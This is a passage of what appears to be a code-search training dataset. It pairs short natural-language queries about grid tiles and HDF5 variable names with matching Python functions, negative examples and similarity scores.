return \"%s.\" % ABGP_VERSION", "def get_ig_name ( base_name ) :\n return base_name + '-GW'", "def autolab_assignment_name(filename):\n m = re.search(\"(.*)_(.*)_[0-9]{12}.csv\", filename)\n if m:\n return m.group(2)\n return None", "def parse_name(self, name):\n domain_regex = None\n image_name = re.split('/', name)[-1]\n domain = None\n path = None\n port = None\n \n split_paths = re.split('/', name)[0:-1]\n if re.search('\\.', split_paths[0]) or split_paths[0] == \"localhost\":\n domain = split_paths[0]\n\n if re.search(':', domain):\n split_domain = re.split(':', domain)\n domain = split_domain[0]\n port = split_domain[1]\n \n path = '/'.join(re.split('/', name)[1:-1])\n\n return(domain, port, path, image_name)", "def get_extension(filename: str) -> str:\n return Path(filename).suffix[1:]", "def _get_info_from_filename(filename: str) -> dict:\n *parts, suffix = filename.split('.')\n dct = re.match(r'^(?P<name>[A-z0-9.]*)(-(?P<num_rows>[0-9]+))?$', '.'.join(parts)).groupdict()\n return {\n 'name': dct['name'],\n 'num_rows': int(dct['num_rows']) if dct['num_rows'] else None,\n 'format': suffix,\n }", "def get_scene_name_without_extension(self):\n return re.sub(r'\\.c4d$', '', self.get_scene_name())", "def _parse_gedi_granule_filename(gedi_filename: str) -> GediNameMetadata:\n\n gedi_naming_pattern = re.compile(\n (\n f\"({GEDI_SUBPATTERN.product})\"\n f\"_({GEDI_SUBPATTERN.year})\"\n f\"({GEDI_SUBPATTERN.julian_day})\"\n f\"({GEDI_SUBPATTERN.hour})\"\n f\"({GEDI_SUBPATTERN.minute})\"\n f\"({GEDI_SUBPATTERN.second})\"\n f\"_({GEDI_SUBPATTERN.orbit})\"\n f\"_({GEDI_SUBPATTERN.sub_orbit_granule})\"\n f\"_({GEDI_SUBPATTERN.ground_track})\"\n f\"_({GEDI_SUBPATTERN.positioning})\"\n f\"_({GEDI_SUBPATTERN.pge_version_number})\"\n f\"_({GEDI_SUBPATTERN.granule_production_version})\"\n f\"_({GEDI_SUBPATTERN.release_number})\"\n )\n )\n parse_result = re.search(gedi_naming_pattern, gedi_filename)\n\n if parse_result is None:\n raise ValueError(\n f\"Filename {gedi_filename} does not conform the the GEDI naming pattern.\"\n )\n return GediNameMetadata(*parse_result.groups())", "def get_group_id(url):\n base = 'maven2/'\n pos = url.find(base)\n if pos < 0:\n raise ValueError('Base not found in the URL')\n\n url2 = url[pos+len(base):]\n return url2.replace('/', '.')", "def get_name(path):\n return path.rsplit('/',1)[1]", "def get_file_extension(filename):\n # Find the first match from the list of supported file extensions\n extension = next((ext for ext in EXT_LST if filename.lower().endswith(ext)), None)\n return extension", "def get_urifilename(uri):\n up=urlparse.urlparse(uri)\n return split(up[2],\"/\")[-1]", "def simplify_job_name(name):\r\n name = name.split('/')[-1]\r\n if 'ver' in name:\r\n name = name.split('ver')[0] + '.ISO'\r\n return name", "def split_filename(path):\n filename = os.path.basename(path)\n name, extension = os.path.splitext(filename)\n region = name.split('.')[0]\n\n return region, name, extension", "def rootname(filename):\n name = os.path.basename(filename)\n root, ext = os.path.splitext(name)\n while ext:\n root, ext = os.path.splitext(root)\n return root", "def GcsBasename(path):\n return os.path.basename(path)", "def get_file_extension(filename):\n if not filename:\n return \"\"\n\n dotpos = filename.rfind(\".\")\n return filename[dotpos + 1:].lower() if dotpos != -1 else \"\"", "def genSampleID(path):\n head, tail = ntpath.split(path)\n result = tail or ntpath.basename(head)\n return genBaseName(result.split(\".\")[0]) # Gets just the sample name, cleans out the \".cleaned.[EXT]\"", "def get_filename(filepath):\n return os.path.basename(filepath)", "def just_the_name(path):\n name = os.path.splitext(os.path.basename(path))[0]\n return name", "def extract_number(word):\n number_flag = True\n number = ''\n word = word.rstrip('.').lstrip('.')\n for char in word:\n try:\n if char == '.' and number_flag:\n number += char\n else:\n int(char)\n if number_flag:\n number += char\n except:\n if len(number) > 0:\n number_flag = False\n continue\n return number", "def _retrosheet_filename(game_id, data_root):\n # game id is TTTYYYYMMDDN.\n team = game_id[:3]\n year = game_id[3:7]\n file_pattern = year + team + \".EV*\"\n file_path = os.path.join(data_root, \"retrosheet\", year, file_pattern)\n file_matches = glob.glob(file_path)\n return file_matches[0] if len(file_matches) else None", "def get_suburb(filepath):\n suburb = filepath.split(\"/\")\n suburb = suburb[1].split(\".\")\n suburb = suburb[0]\n return suburb", "def part1(filename: str) -> int:\n data = parse(filename)\n return floor(data)", "def getFileName(filepath):\n return os.path.splitext(os.path.basename(filepath))[0]", "def split_name(filename):\n # *********** My filename are in the format ./CaAl2Si2O8_T3_nvt_a12.5.\n # ******* so I can split their name with _ and take the compound and T from their name\n filename = filename.strip('./')\n temperature = str(int(float(filename.split('_')[1].strip('T'))*1000))\n acell = filename.split('_')[3].split('.outcar')[0].strip('a')\n return temperature, acell", "def get_file_name(file):\n return os.path.splitext(os.path.basename(file))[0]", "def get_stock_from_path(pathname): #{{{\n return os.path.splitext(pathname.split(\"/\")[-1])[0]", "def filename_ext(filename):\n base = os.path.basename(filename)\n return os.path.splitext(base)[1][1:]" ]
[ "0.63735604", "0.62062746", "0.6061637", "0.58868164", "0.5818382", "0.5740342", "0.5669474", "0.5658069", "0.5641101", "0.5620341", "0.5620254", "0.56191593", "0.56164837", "0.56108224", "0.5606117", "0.55956405", "0.5589816", "0.558568", "0.557769", "0.5521931", "0.55009794", "0.5497475", "0.5487516", "0.5469965", "0.5462271", "0.54598093", "0.54462576", "0.5428249", "0.5417183", "0.5403374", "0.53905576", "0.5389262", "0.53718275", "0.5353585", "0.5343735", "0.53195184", "0.5298148", "0.5292429", "0.52832526", "0.5278958", "0.52618", "0.52598923", "0.5259843", "0.5243614", "0.5239973", "0.522567", "0.52236646", "0.5220286", "0.5204501", "0.52010834", "0.51985794", "0.5196815", "0.51967365", "0.51880157", "0.5173927", "0.5172193", "0.51686585", "0.5166954", "0.5163242", "0.5152859", "0.5145969", "0.5137598", "0.5125803", "0.5121566", "0.5120476", "0.5118646", "0.5118029", "0.5111328", "0.5111219", "0.51106036", "0.51100296", "0.5107405", "0.51072514", "0.51062405", "0.5099925", "0.5088399", "0.50879496", "0.5081162", "0.50810194", "0.50714535", "0.50626326", "0.5062484", "0.5049791", "0.5049465", "0.50471723", "0.5044453", "0.50437176", "0.5042747", "0.50392014", "0.503201", "0.50309116", "0.50190705", "0.5018164", "0.5013063", "0.5012467", "0.5010993", "0.5006202", "0.50002193", "0.49996755" ]
0.6381265
1
How many tiles per row and col > (ny,nx).
def get_num_tiles(grid_bbox, dxy): xmin, xmax, ymin, ymax = grid_bbox return (int(np.abs(ymax-ymin)/dxy), int(np.abs(xmax-xmin)/dxy))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def num_tiles(self):\n return self.num_row_tiles * self.num_col_tiles", "def get_num_tiles(rows, cols, row_tile_size, col_tile_size):\n num_row_tiles = math.ceil(rows / row_tile_size)\n num_col_tiles = math.ceil(cols / col_tile_size)\n return num_row_tiles, num_col_tiles", "def getNumTiles(self):\n return self.w * self.h", "def getNumTiles(self):\n return len(list(product(list(range(self.width+1))[1:], list(range(self.height+1))[1:])))", "def getNumTiles(self):\n return self.height * self.width", "def getNumTiles(self):\n return (self.width) * (self.height)", "def getNumTiles(self):\n #raise NotImplementedError #refer https://docs.python.org/2/library/exceptions.html\n return self.width * self.height", "def getNumTiles(self):\n\t\treturn self.numTiles", "def voxel_count(self):\n return self.cols * self.rows * self.sections", "def num_cells_for_rows(self, rows):\r\n return (rows * rows + rows) // 2", "def get_nr_of_misplaced_tiles(board):\n result = 0\n\n for idx, val in enumerate(board):\n if idx != val:\n result += 1\n\n return result", "def tile_size_2d(self):\n return 32.0, 32.0", "def rectangles_in_grid(x_f, y_f):\n count = 0\n for x in range(x_f):\n for y in range(y_f):\n for i in range(x, x_f):\n for j in range(y, y_f):\n count += 1\n return count", "def ncells(self):\n return self.izone.size", "def getNumTiles(self):\n return self.numTiles\n #raise NotImplementedError", "def count_tilings(n: int) -> int:\n if n < 5:\n # handle recursive base case\n return 2**(n - 1)\n else:\n # place each tile at end of row and recurse on remainder\n return (count_tilings(n - 1) +\n count_tilings(n - 2) +\n count_tilings(n - 3) +\n count_tilings(n - 4))", "def _count_seen_occupied(grid: List[List[str]], row: int, col: int) -> int:\n count = 0\n for dx in [-1, 0, 1]:\n for dy in [-1, 0, 1]:\n if not (dx == 0 and dy == 0):\n count += 1 if _is_occupied(grid, row, col, dx, dy) else 0\n return count", "def num_black_neighbors(tile, tiles):\n return sum([tiles[add(tile, step)] for step in NEIGHBORS])", "def no_of_misplaced_tiles(state):\r\n h1 = 0\r\n goal_state = [[0], [1, 2, 3], [4, 5, 6], [7, 8, 9]]\r\n for y in range(len(goal_state)):\r\n for x in range(len(goal_state[y])):\r\n if state[y][x] != goal_state[y][x]:\r\n h1 += 1\r\n return h1", "def get_size_of_grid(self):\n row = 0\n column = 0\n if int(self.var1.get()) == 1:\n row, column = 6, 6\n\n if int(self.var2.get()) == 1:\n row, column = 7, 6\n\n if int(self.var3.get()) == 1:\n row, column = 7, 7\n\n if int(self.var4.get()) == 1:\n row, column = 8, 8\n\n return row, column", "def num_cells(self):\n if hasattr(self, '__num_cells__'):\n return self.__num_cells__\n if self.x is not None:\n return self.x.size(self.__cat_dim__('x', self.x))\n if self.boundary_index is not None:\n return int(self.boundary_index[1,:].max()) + 1\n assert self.upper_index is None and self.lower_index is None\n return None", "def count_island(row, col, island):\n count = 0\n for i in range(row):\n for j in range(col):\n count = count + floodfill(i, j, row, col, island)\n return count", "def rows(self) -> int:\n return self.__squares.__len__()", "def calculate_dimensions(self):\n x_coordinates = np.sort(self.grid['x'][:, 0]) # first x node\n self.nr_nodes_z = np.where(x_coordinates == x_coordinates[0])[0].size\n self.nr_elements_x = self.elements.shape[0] / (self.nr_nodes_z - 1)\n self.nr_nodes_x = self.nr_elements_x + 1\n self.nr_elements_z = self.nr_nodes_z - 1", "def __FreeTiles(self, grid, log=False):\n\n x_pos, _ = np.where(grid == 0)\n return len(x_pos)", "def grid_point_count(self):\n return pytools.product(self.grid_point_counts())", "def __len__(self) -> int:\n return len(self._tiles)", "def calculate_min_max_tiles(self):", "def numPixels(self):\n\t\treturn self.size", "def numPixels(self):\n\t\treturn self.size", "def get_cells(self):\r\n return \\\r\n (self.nx-1 if self.nx>1 else 1)* \\\r\n (self.ny-1 if self.ny>1 else 1)* \\\r\n (self.nz-1 if self.nz>1 else 1)", "def get_nb_element_per_dimension(recipe):\n return len(recipe[\"r\"]), len(recipe[\"c\"]), len(recipe[\"z\"])", "def columns(self) -> int:\n return self.__squares[0].__len__()", "def test_room_has_tiles(self):\n self.assertEqual(self.room.tile_set.count(), self.room.grid_size ** 2)", "def dimensions():", "def getAdjacentCount(grid, x, y, X, Y, char):\n count = 0\n try{\n if x == 0:\n\n if y == 0:\n\n if x == X-1:\n\n if y == Y-1:\n }", "def calculate_grid_dimensions(num_items, num_columns=None):\n if num_columns is None:\n num_rows_columns = int(math.ceil(math.sqrt(num_items)))\n return num_rows_columns, num_rows_columns\n else:\n num_rows = int(math.ceil(num_items / num_columns))\n return num_rows, num_columns", "def dim(self) -> int:", "def part_one():\n return len(numpy.where(grid > 1)[0])", "def size(self):\n return self.__row_count * self.__col_count", "def largest_island(grid: list[list[int]]) -> int:\n rows = len(grid)\n cols = len(grid[0])\n\n visited = [[False for _ in range(cols)] for _ in range(rows)]\n max_island_size = 0\n for i in range(rows):\n for j in range(cols):\n if grid[i][j] == 1 and not visited[i][j]:\n island_size = flood_island(grid, i, j, visited)\n max_island_size = max(max_island_size, island_size)\n\n return max_island_size", "def count_num_masked_tiles(subgrid):\n\n\tnum_masked_tiles = 0\n\tfor tile in subgrid:\n\t\tif (tile == MaskedTile.MASKED) or (tile == MaskedTile.FLAG):\n\t\t\tnum_masked_tiles += 1\n\n\treturn num_masked_tiles", "def Ncells(self):\n return len(self.cells)", "def _count_adj_occupied(grid: List[List[str]], row: int, col: int) -> int:\n count = 0\n if row - 1 >= 0:\n if col - 1 >= 0:\n count += 1 if grid[row - 1][col - 1] == '#' else 0\n if col + 1 < len(grid[0]):\n count += 1 if grid[row - 1][col + 1] == '#' else 0\n count += 1 if grid[row - 1][col] == '#' else 0\n if row + 1 < len(grid):\n if col - 1 >= 0:\n count += 1 if grid[row + 1][col - 1] == '#' else 0\n if col + 1 < len(grid[0]):\n count += 1 if grid[row + 1][col + 1] == '#' else 0\n count += 1 if grid[row + 1][col] == '#' else 0\n if col - 1 >= 0:\n count += 1 if grid[row][col - 1] == '#' else 0\n if col + 1 < len(grid[0]):\n count += 1 if grid[row][col + 1] == '#' else 0\n return count", "def count(grid):\n star='@'\n c = 0\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j]==star: c += 1\n return c", "def numIslands(grid):\n # count to store each new island found\n count = 0\n # If the grid is empty, return 0\n if not grid:\n return count\n\n y_max = len(grid)\n x_max = len(grid[0])\n \n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == '1':\n dfs(grid, i, j)\n count += 1\n return count", "def _get_number_of_rows_to_process(self, bitsPerPixel):\n # TODO: do a better job estimating the number of rows to process.\n # Compute the number of pixels that fit under the memory limit.\n memLimit = (psutil.virtual_memory().available/\n (bitsPerPixel*(1024**2)))\n memLimit = int(50*np.floor(memLimit/10.0))\n numStackPix = memLimit*(1024**2)*8/bitsPerPixel\n\n # Grab the number of images and the shape of those image\n numImg, ny, nx = self.shape\n\n # Compute the number of rows to be processed in each chunk\n numRows = int(np.floor(numStackPix/(numImg*nx)))\n\n # Catch the case where ALL rows get handled at once\n if numRows > ny: numRows = ny\n numSections = int(np.ceil(ny/numRows))\n\n # Recompute the number of rows to be evenly spaced\n numRows = int(np.ceil(ny/numSections))\n\n return numRows, numSections", "def checkNumNeighbors():", "def number_of_patches(width, height, patch_size):\n n_patches_x = width // patch_size\n n_patches_y = height // patch_size\n return n_patches_x, n_patches_y", "def get_grid_width(puzzle: str) -> int:\r\n return int(len(puzzle) ** (1 / 2))", "def cellsize_2d(self):\t\r\n return self.dx * self.dy", "def main():\n row, col, island = make_matrix()\n print(count_island(row, col, island))", "def getNumGrids(self):\n c = list(self.gridVars.keys())\n return len(list(self.gridVars[c[0]].values()))", "def count_neighbors(self, row, col):\n neighbors = 0\n neighbors += self.get_cell_value(row - 1, col - 1)\n neighbors += self.get_cell_value(row - 1, col)\n neighbors += self.get_cell_value(row - 1, col + 1)\n neighbors += self.get_cell_value(row, col - 1)\n neighbors += self.get_cell_value(row, col + 1)\n neighbors += self.get_cell_value(row + 1, col - 1)\n neighbors += self.get_cell_value(row + 1, col)\n neighbors += self.get_cell_value(row + 1, col + 1)\n\n return neighbors", "def howManyNeigbors(board,row,col):\r\n\tneigbors = 0\r\n\tif board[row-1][col-1] == 1:\r\n\t\tneigbors += 1\r\n\tif board[row-1][col] == 1:\r\n\t\tneigbors += 1\r\n\tif board[row-1][col+1] == 1:\r\n\t\tneigbors += 1\r\n\tif board[row][col-1] == 1:\r\n\t\tneigbors += 1\r\n\tif board[row][col+1] == 1:\r\n\t\tneigbors += 1\r\n\tif board[row+1][col-1] == 1:\r\n\t\tneigbors += 1\r\n\tif board[row+1][col] == 1:\r\n\t\tneigbors += 1\r\n\tif board[row+1][col+1] == 1:\r\n\t\tneigbors += 1\r\n\treturn neigbors", "def get_grid_size(self, img):\r\n grid_height = int(np.ceil(img.shape[0] / self.config.grid_row))\r\n grid_width = int(np.ceil(img.shape[1] / self.config.grid_col))\r\n return grid_height, grid_width", "def numNeighbors(minesSet, row_index, cols_index, num_cols, num_rows):\n mines = 0\n for j in np.arange(max(0, cols_index-1), min(num_cols-1, cols_index+1)+1):\n for i in np.arange(max(0, row_index-1), min(num_rows-1, row_index+1)+1):\n if ((i, j) in minesSet):\n mines+=1\n return mines", "def test_can_traverse_wide_grid(self):\n grid = [[\"1\", \"0\", \"1\", \"1\", \"0\", \"1\", \"0\", \"0\", \"1\", \"0\"]]\n result = num_islands(grid)\n self.assertEqual(result, 4)", "def get_neighbors_of(cell, board):\n count = 0\n (x, y) = cell\n for cell in board:\n if cell == (x - 1, y - 1):\n count += 1\n elif cell == (x, y - 1):\n count += 1\n elif cell == (x + 1, y - 1):\n count += 1\n elif cell == (x - 1, y):\n count += 1\n elif cell == (x + 1, y):\n count += 1\n elif cell == (x - 1, y + 1):\n count += 1\n elif cell == (x, y + 1):\n count += 1\n elif cell == (x + 1, y + 1):\n count += 1\n return count", "def row_count(self):\n return self.well_count // self.col_count", "def getAdjacentWrapCount(grid, x, y, X, Y, char):\n count = 0\n # X, % Y gets spaces that are wrapped around the grid \n # Get x coordinates for adjacent grid spaces\n for i in [(x-1) % X, x, (x+1) % X]:\n # Get y coordinates for adjacent grid \n for j in [(y-1) % Y, y, (y+1) % Y]:\n # if the grid space is present and not the center of the grid spaces\n if (i, j) != (x, y) and grid[i][j] == char:\n count += 1\n return count", "def get_tile(self, row, col):\n # replace with your code\n return 0", "def count_ones(self):\r\n count = 0\r\n for x in range(self.xspan):\r\n for y in range(self.yspan):\r\n if (self.cells[x][y] == 1):\r\n count = count + 1\r\n return count", "def figure_out_grid(tot):\n guess = np.round(np.sqrt(tot))\n\n dims = [guess,guess]\n\n flag = True\n\n while(flag):\n if dims[0]*dims[1] < tot:\n dims[0] += 1\n flag = True\n elif dims[0]*dims[1] >tot and dims[0]*dims[1] <(tot-dims[1]):\n dims[0] -= 1\n flag = True\n else:\n flag = False\n return tuple(dims)", "def get_number_neighbours_of_cell(self, x_cell, y_cell):\n alive_neighbours = 0\n \n # neighbour indices\n x_indices = [x_cell-1, x_cell, x_cell+1]\n y_indices = [y_cell-1, y_cell, y_cell+1]\n\n\n #TODO: use functional programming ^^^^^^\n #x_indices = list(filter(lambda x: x < 0 and x > self.size[0], x_indices))\n #y_indices = list(filter(lambda y: y < 0 and y > self.size[1], y_indices))\n \n # correct indices for cell neighbours based on wrap_around_borders\n #TODO: this so far only works for x,y same size..\n if self.wrap_around_borders:\n for indices in [x_indices, y_indices]:\n if -1 in indices:\n indices.remove(-1)\n indices.append(self.board_size[0] - 1)\n if self.board_size[0] in indices:\n indices.remove(self.board_size[0])\n indices.append(0)\n else:\n for indices in [x_indices, y_indices]:\n if -1 in indices:\n indices.remove(-1)\n if self.board_size[0] in indices:\n indices.remove(self.board_size[0])\n\n # check each neighbour status and add to counter\n for x in x_indices:\n for y in y_indices:\n alive_neighbours = alive_neighbours + self.board_state[x][y]\n\n # dont count own value\n alive_neighbours = alive_neighbours - self.board_state[x_cell][y_cell]\n\n return alive_neighbours", "def compute_nrows_ncolumns(nplots):\n n_rows = int(np.sqrt(nplots)) + (np.sqrt(nplots) != int(np.sqrt(nplots))) * 1\n n_columns = int(nplots / n_rows) + (nplots / n_rows != int(nplots / n_rows)) * 1\n return n_rows, n_columns", "def neighbor(board, x, y, n, m):\n deltas = (\n (-1, -1), (-1, 0), (-1, 1),\n (0, -1), (0, 1),\n (1, -1), (1, 0), (1, 1),\n )\n count = 0\n for dx, dy in deltas:\n xx = x + dx\n yy = y + dy\n if xx >= 0 and xx < n and yy >= 0 and yy < m and board[xx][yy] % 2 == 1:\n count += 1\n\n return count", "def countNeighbors(row, col, A):\n h = len(A)\n w = len(A[0])\n count = 0\n for x in range(-1, 2, 1):\n for y in range(-1, 2, 1):\n if abs(x) + abs(y) != 0:\n count += A[row+x][col+y]\n return count", "def __len__(self):\n return len(self._grid)", "def recursive_grid_count(x, y):\n if x < 1 or y < 1:\n raise ValueError(\"Invalid input\")\n if x == 1 and y == 1:\n return 1\n if x == 1:\n return recursive_grid_count(x, y-1) + y\n if y == 1:\n return recursive_grid_count(x-1, y) + x\n return recursive_grid_count(x-1, y) + recursive_grid_count(x, y-1) - recursive_grid_count(x-1, y-1) + x * y", "def calc_grid(self):\n return int(self._posn.x / cell_size), int(self._posn.y / cell_size)", "def plaquette_rows_cols(self):\n return len(self.minor_yvals()), len(self.minor_xvals())", "def island_perimeter(grid):\n count = 0\n for row in grid:\n size = len(row)\n row.insert(0, 0)\n row.append(0)\n grid.insert(0, [0 for x in range(size + 2)])\n grid.append([0 for x in range(size + 2)])\n\n for e, row in enumerate(grid):\n for i, num in enumerate(row):\n if num == 1:\n if grid[e][i - 1] != 1:\n count += 1\n if grid[e][i + 1] != 1:\n count += 1\n if grid[e - 1][i] != 1:\n count += 1\n if grid[e + 1][i] != 1:\n count += 1\n return count", "def island_perimeter(grid):\n total = 0\n for x in range(0, len(grid)):\n for y in range(0, len(grid[0])):\n if grid[x][y] == 1:\n if x == 0 or grid[x - 1][y] == 0:\n total += 1\n if x == len(grid) - 1 or grid[x + 1][y] == 0:\n total += 1\n if y == len(grid[0]) - 1 or grid[x][y + 1] == 0:\n total += 1\n if y == 0 or grid[x][y - 1] == 0:\n total += 1\n return total", "def compute_num_tracks(x_offset: int, y_offset: int,\n x: int, y: int, track_info: Dict[int, int]):\n x_diff = x - x_offset\n y_diff = y - y_offset\n result = 0\n for length, num_track in track_info.items():\n if x_diff % length == 0 and y_diff % length == 0:\n # it's the tile\n result += num_track\n return result", "def island_perimeter(grid):\n count = 0\n for j, r in enumerate(grid):\n for i, c in enumerate(r):\n if c == 1:\n if j == 0 or grid[j - 1][i] == 0:\n count += 1\n if i == 0 or grid[j][i - 1] == 0:\n count += 1\n if j == len(grid) - 1 or grid[j + 1][i] == 0:\n count += 1\n if i == len(r) - 1 or grid[j][i + 1] == 0:\n count += 1\n return count", "def count_alive_cells(self, x, y):\n\n # indices of surrounding cells.\n ul = max(y - 1, 0) # upper left\n ur = min(y + 2, self.f_shape[1]) # upper right\n bl = max(x - 1, 0) # bottom left\n br = min(x + 2, self.f_shape[0]) # bottom right\n\n # slice\n cells = self.cells[bl:br, ul:ur]\n n_cells = np.count_nonzero(cells)\n\n return n_cells - self.cells[x][y]", "def in_grid(self, tile):\n return 0 <= tile[0] < self.gs[0] and 0 <= tile[1] < self.gs[1]", "def island_perimeter(grid):\n\n counter = 0\n for i in range(len(grid)):\n for j in range(len(grid[i])):\n if (grid[i][j] == 1):\n if ((j + 1) == len(grid[i]) or (grid[i][j + 1] == 0)):\n counter += 1\n if ((j - 1) < 0 or (grid[i][j - 1] == 0)):\n counter += 1\n if ((i + 1) == len(grid) or (grid[i + 1][j] == 0)):\n counter += 1\n if ((i - 1) < 0 or (grid[i - 1][j] == 0)):\n counter += 1\n return counter", "def num_nodes(self):\n return self._grid", "def getNumCleanedTiles(self):\n tilesCopy = {}\n tilesCopy = self.tiles.copy()\n numCleanTiles = 0\n \n for posTupleKey, posVal in tilesCopy.items():\n if posVal == 1:\n numCleanTiles += 1\n return numCleanTiles\n #raise NotImplementedError", "def score(grid):\n result = 0\n for r in range(WORLD_WIDTH):\n for c in range(WORLD_WIDTH):\n if grid[r, c] != DIRT:\n result += 1\n return result", "def mapSize(self):\n return len(self._cells)", "def countNeighbors(oldgen, x, y):\n temp = 1\n\n count = 0\n for i in range(-1, 2):\n for j in range(-1, 2):\n\n # TODO: this needs rewritin to be more understandable\n if not (i == 0 and j == 0):\n count += int(oldgen[(x + i + WID) % WID][(y + j + HGT) % HGT])\n\n for i in range(-1, 2):\n for j in range(-1, 2):\n temp += 1\n\n count -= int(oldgen[x][y])\n\n return count", "def part1(mem):\n return len(paint_panels(mem, 0))", "def is_in_the_grid(self, row: int, col: int) -> bool:\n return 0 <= row < self.n_row and 0 <= col < self.n_col", "def island_perimeter(grid):\n\n count = 0\n\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n mul = 4\n if grid[i][j] == 1:\n if j < len(grid[0]) - 1:\n if grid[i][j + 1] == 1:\n mul -= 1\n if grid[i][j - 1] == 1 and j > 0:\n mul -= 1\n if i < len(grid) - 1:\n if grid[i + 1][j] == 1:\n mul -= 1\n if grid[i - 1][j] == 1 and i > 0:\n mul -= 1\n else:\n continue\n count += mul\n return count", "def get_length(board):\n length = 0\n for i in range(n):\n for j in range(n):\n length += len(board[i][j])\n return length", "def _get_dimensions(self):\n corners = []\n for module in self.modules:\n for tile in module:\n corners.append(tile.corner_idx)\n corners.append(tile.opp_corner_idx)\n corners = np.stack(corners)\n\n # Find extremes\n min_yx = corners.min(axis=0)\n max_yx = corners.max(axis=0)\n\n size = max_yx - min_yx\n centre = -min_yx\n return tuple(size), centre", "def get_number_of_rows_and_columns(m):\n\n r = int(np.sqrt(m))\n c = m // r if np.mod(m, r) == 0 else m // r + 1\n return r, c", "def expected_width(self):\n\t\treturn self.expected_tile_width * TILE_SIZE", "def nNx(self):\n return self.nCx + 1", "def count_num_empty_tiles_not_masked(subgrid):\n\n\tnum_empty_tiles_not_masked = 0\n\tfor tile in subgrid:\n\t\tif tile == MaskedTile.EMPTY:\n\t\t\tnum_empty_tiles_not_masked += 1\n\n\treturn num_empty_tiles_not_masked", "def getDims(img):\n n,m,k = np.shape(img) \n N,M = 0,0\n for i in range(1,n):\n if np.array_equal(img[i],img[i-1]):\n N += 1\n for j in range(1,m):\n if np.array_equal(img[:,j],img[:,j-1]):\n M += 1\n return N,M,n,m", "def tileWidth(self):\n return self._tileWidth", "def dimension(self):\r\n a = 0\r\n for x in self.faces():\r\n if (len(x) > a):\r\n a = len(x) \r\n return a-1", "def count_cells(rule, n=500):\n ca = Cell1D(rule, n)\n ca.start_single()\n\n res = []\n for i in range(1, n):\n cells = np.sum(ca.array)\n res.append((i, i**2, cells))\n ca.step()\n\n return res", "def get_map_size(self, map_major_dim=None):\n w, h = self.img_size\n mmd = map_major_dim\n if w >= h:\n x_tiles = mmd\n y_tiles = round(h / w * mmd)\n else:\n x_tiles = round(w / h * mmd)\n y_tiles = mmd\n\n return (x_tiles, y_tiles)", "def test_can_traverse_tall_grid(self):\n grid = [\n [\"0\"],\n [\"1\"],\n [\"1\"],\n [\"0\"],\n [\"1\"],\n [\"0\"],\n [\"1\"],\n [\"0\"],\n [\"1\"],\n ]\n result = num_islands(grid)\n self.assertEqual(result, 4)", "def numTilePossibilities(self, tiles: str) -> int:\n def generate(tiles: str, length: int) -> int:\n count = 0\n for i, symbol in enumerate(tiles):\n if i and tiles[i - 1] == symbol:\n continue\n if length > 1:\n count += generate(tiles[:i] + tiles[i+1:], length - 1)\n else:\n count += 1\n return count\n \n count = 0\n tiles = ''.join(sorted(tiles))\n for i in range(len(tiles)):\n count += generate(tiles, i + 1)\n return count" ]
[ "0.83870953", "0.82873094", "0.8044176", "0.80318546", "0.7763642", "0.7731704", "0.75307924", "0.7150116", "0.70772505", "0.7041915", "0.6943248", "0.6927167", "0.6907514", "0.68812686", "0.6836811", "0.67657024", "0.6740372", "0.6629903", "0.6573289", "0.65704787", "0.65530694", "0.6545329", "0.6480006", "0.64734304", "0.6468995", "0.64498883", "0.6441541", "0.6426244", "0.6425113", "0.6425113", "0.64238167", "0.63638705", "0.635766", "0.6348827", "0.634662", "0.63449895", "0.6340491", "0.6335841", "0.633221", "0.63279456", "0.6309132", "0.63068473", "0.6305959", "0.630252", "0.6302096", "0.6291851", "0.6287323", "0.62860453", "0.62832475", "0.6282118", "0.62810695", "0.6280342", "0.62773013", "0.62718225", "0.62678534", "0.62447673", "0.623512", "0.6233805", "0.6231677", "0.6216362", "0.6205091", "0.61979103", "0.6189771", "0.61827654", "0.61802167", "0.61672246", "0.6157363", "0.61445576", "0.6134287", "0.61298674", "0.6128402", "0.61208767", "0.6107936", "0.6090788", "0.60880023", "0.6084285", "0.60832566", "0.608247", "0.60775775", "0.607753", "0.6073784", "0.60663664", "0.6052028", "0.6044756", "0.60434043", "0.60430515", "0.6042081", "0.6040847", "0.6038589", "0.60340166", "0.6032884", "0.603026", "0.6029441", "0.6025336", "0.60234535", "0.60215026", "0.6019526", "0.6010269", "0.60081524", "0.6007937" ]
0.77562994
5
Return all 2d '/variable' names in the HDF5.
def get_grid_names(fname): with h5py.File(fname, 'r') as f: vnames = [k for k in f.keys() if f[k].ndim == 2] return vnames
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def data_variable_names(self):\n data_names = []\n mesh = self.mesh_names()\n prefix = mesh[0]+'_'\n for vname in self.nc.variables.keys():\n if vname.startswith(prefix):\n if self.nc.dimensions.has_key(vname):\n continue\n if hasattr(self.nc.variables[vname],'cf_role'):\n continue\n data_names.append( vname[len(prefix):] )\n return data_names", "def variable_names(self):\n \n return [x['variable'] for x in self.variable_dicts()]", "def variables_used (self) :\r\n\t\t## These names do not contain dimension specification (everything in brackets\r\n\t\t## that comes after a name is am array index - either the arry was declared\r\n\t\t## correctly or it is wrong anyway, there is no implicit declaration of arrays) !\r\n\r\n\t\tresult = []\r\n\r\n\t\tfor l in self.equ_lists :\r\n\t\t\tfor var_name in l :\r\n\t\t\t\tresult.append(var_name[0])\r\n\t\treturn result", "def get_variable_names(self):\n return [var[1] for var in self.variables]", "def getOthVarNames( self ):\n\n if self.othVarNames:\n return self.othVarNames.keys()\n\n n = self.adb.get( \"nOthVars\" )\n for indx in range( n ):\n name = self.adb.get( \"othVarName\",\n indx ) \n self.othVarNames[ name ] = indx\n\n return self.othVarNames.keys()", "def get_node_variable_names(self):\n return [b\"\".join(_i).strip().decode()\n for _i in self._f.variables[\"name_nod_var\"][:]]", "def getOhcVarNames( self ):\n\n if self.ohcVarNames:\n return self.ohcVarNames.keys()\n \n n = self.adb.get( \"nOhcVars\" )\n for indx in xrange( n ):\n name = self.adb.get( \"ohcVarName\",\n indx ) \n self.ohcVarNames[name] = indx\n\n return self.ohcVarNames.keys()", "def variables_used (self) :\r\n\t\t## These names possibly contain dimension specification!\r\n\t\treturn self.variable_names", "def read_hdf5_group(filename, gname, vars_name=None):\n fid = h5py.File(filename, 'r')\n gid = fid.get(gname)\n if vars_name is None: 